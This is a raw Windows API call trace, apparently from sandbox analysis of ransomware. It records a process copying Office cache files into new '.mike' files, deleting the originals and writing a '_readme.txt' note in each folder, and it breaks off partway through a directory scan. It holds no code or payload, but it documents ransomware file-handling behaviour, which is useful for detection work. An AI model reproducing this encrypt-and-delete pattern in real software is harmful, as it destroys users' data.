[0040.919] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.919] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x21c5d2c | out: lpFileInformation=0x21c5d2c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5ac)) returned 1 [0040.920] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.920] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.920] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.920] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x21c6048 | out: lpFileInformation=0x21c6048*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5ac)) returned 1 [0040.920] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.920] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.920] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.920] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.920] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.920] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.920] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.920] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.920] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.920] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.920] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0040.921] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.921] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0040.921] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.921] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0040.921] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.921] GetFileType (hFile=0x264) returned 0x1 [0040.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0040.922] GetFileType (hFile=0x264) returned 0x1 [0040.922] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0040.922] WriteFile (in: hFile=0x264, lpBuffer=0x21c6ec4*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x21c6ec4*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0040.923] CloseHandle (hObject=0x264) returned 1 [0040.923] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0040.923] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x21c69cc | out: lpFileInformation=0x21c69cc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5ac)) returned 1 [0040.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0040.923] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.923] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0040.923] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.924] GetFileType (hFile=0x264) returned 0x1 [0040.924] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0040.924] GetFileType (hFile=0x264) returned 0x1 [0040.924] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0040.924] ReadFile (in: hFile=0x264, lpBuffer=0x21c7fec, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x21c7fec*, lpNumberOfBytesRead=0x2af110*=0x5ac, lpOverlapped=0x0) returned 1 [0040.925] CloseHandle (hObject=0x264) returned 1 [0040.926] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.926] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0040.926] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.926] GetFileType (hFile=0x264) returned 0x1 [0040.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0040.926] GetFileType (hFile=0x264) returned 0x1 [0040.926] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0040.926] WriteFile (in: hFile=0x264, lpBuffer=0x21cd098*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x21cd098*, lpNumberOfBytesWritten=0x2af104*=0x5b0, lpOverlapped=0x0) returned 1 [0040.926] CloseHandle (hObject=0x264) returned 1 [0040.927] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.927] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0040.927] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.927] GetFileType (hFile=0x264) returned 0x1 [0040.927] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0040.927] GetFileType (hFile=0x264) returned 0x1 [0040.928] WriteFile (in: hFile=0x264, lpBuffer=0x21d02c0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x21d02c0*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0040.928] CloseHandle (hObject=0x264) returned 1 [0040.929] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.929] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.929] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.929] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe296f540, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe296f540, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe29956a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7d0)) returned 1 [0040.929] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.929] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.929] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.929] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.929] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x21d1a3c | out: lpFileInformation=0x21d1a3c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe296f540, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe296f540, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe29956a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7d0)) returned 1 [0040.929] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.929] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.929] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0040.930] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.930] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0040.930] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.930] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.931] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.931] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.931] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.931] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0040.931] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0040.931] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0040.932] GetFileType (hFile=0x264) returned 0x1 [0040.932] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0040.932] GetFileType (hFile=0x264) returned 0x1 [0040.932] WriteFile (in: hFile=0x264, lpBuffer=0x21d3720*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x21d3720*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0040.933] CloseHandle (hObject=0x264) returned 1 [0040.933] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0040.933] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.933] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0040.933] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe296f540, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe29956a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0040.933] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe296f540, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe29956a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.933] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee4bb7b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x3e7e1f, dwReserved0=0x0, dwReserved1=0x0, cFileName="GrooveLR.cab", cAlternateFileName="")) returned 1 [0040.933] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee3b15e0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x264400, dwReserved0=0x0, dwReserved1=0x0, cFileName="GrooveMUI.msi", cAlternateFileName="GROOVE~1.MSI")) returned 1 [0040.934] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe296f540, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe296f540, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe296f540, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x5c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="GrooveMUI.xml.mike", cAlternateFileName="GROOVE~1.MIK")) returned 1 [0040.934] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe296f540, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe296f540, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe29956a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml.mike", cAlternateFileName="SETUPX~1.MIK")) returned 1 [0040.934] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe296f540, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe296f540, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe29956a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0040.934] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe296f540, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe296f540, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe29956a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0040.934] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0040.934] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0040.934] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0040.934] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\.", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.934] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0040.934] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0040.934] CoTaskMemFree (pv=0x4fe370) [0040.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0040.935] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.935] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0040.935] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.935] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\", 